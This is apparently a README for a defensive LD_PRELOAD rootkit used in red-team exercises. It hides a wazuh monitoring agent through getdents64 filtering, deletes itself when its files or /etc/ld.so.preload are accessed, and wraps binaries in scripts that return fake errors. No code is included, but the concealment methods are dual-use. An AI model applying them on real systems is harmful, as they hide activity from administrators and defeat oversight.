Defensive LD_PRELOAD rootkit that conceals wazuh-agent and silently monitors unauthorized filesystem alterations from inside attacker-controlled processes. Main priority is stealth. Upon attempted access of rootkit files or /etc/ld.so.preload, "apoptosis" is triggered and the rootkit is cleanly deleted. It's more important to conceal the fact that we're using this strategy than fight red team; the incident reports should reveal what process triggered the Cytochrome C tripwire and help a human admin identify red team's persistence and C2.

Also includes an "epidermis" of shell scripts protecting "organs" (important binaries). Queries for wazuh are filtered out and simulated errors are delivered as needed. Installation is automatic based on the presence of the target organ in /usr/bin. .organ files (real binaries) can be called (e.g. run "apt.organ update" instead of "apt update") but are concealed by the rootkit from getdents64.